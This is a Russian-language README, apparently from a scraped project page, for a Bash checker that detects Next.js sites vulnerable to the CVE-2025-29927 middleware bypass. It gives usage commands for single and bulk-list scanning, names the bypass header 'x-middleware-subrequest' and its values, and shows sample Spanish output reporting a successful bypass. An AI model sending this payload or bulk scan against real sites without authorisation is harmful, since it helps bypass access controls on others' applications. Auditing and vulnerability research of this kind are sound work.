
CVE-2025-29927 Эксплойт-чекер
Автоматизированный инструмент на Bash для обнаружения приложений Next.js, уязвимых к обходу middleware CVE-2025-29927, согласно исследованию Zhero Web Security.
bashwhatwebcurlУстановите их в Debian/Ubuntu с помощью:
sudo apt install whatweb curl
./CVE-2025-29927.sh -u https://example.com
Создайте файл urls.txt с одной URL на строку:
https://target1.com
https://target2.com
Запустите:
./nextjs_bypass_checker_v2.sh -l urls.txt
Идентификация Next.js
whatweb для обнаружения технологии./_next/static/BUILD_ID и _buildManifest.js.Обнаружение Middleware
X-Middleware-RewriteX-Middleware-Set-CookieТест на обход (bypass)
x-middleware-subrequest и определяются заголовки.[*] Analizando: https://victima.com
[+] WhatWeb:
-> Detectado: Next.js[12.2.0]
[+] BUILD_ID: 3fjd92hf8
[+] Versión detectada: 12.2.0
[+] Middleware activo (cabeceras detectadas):
X-Middleware-Rewrite: /not-found/locale=en
[+] Probando exploits:
-> x-middleware-subrequest: middleware -> ✅ BYPASS EXITOSO (cabeceras desaparecieron)
-> x-middleware-subrequest: src/middleware -> ❌ Middleware no evadido
[*] Finalizado: https://victima.com
Этот скрипт предназначен для образовательных целей и авторизованного аудита. Не используйте его против целей без согласия. Неправомерное использование может являться незаконной деятельностью.
Основано на исследовании: Zhero Web Security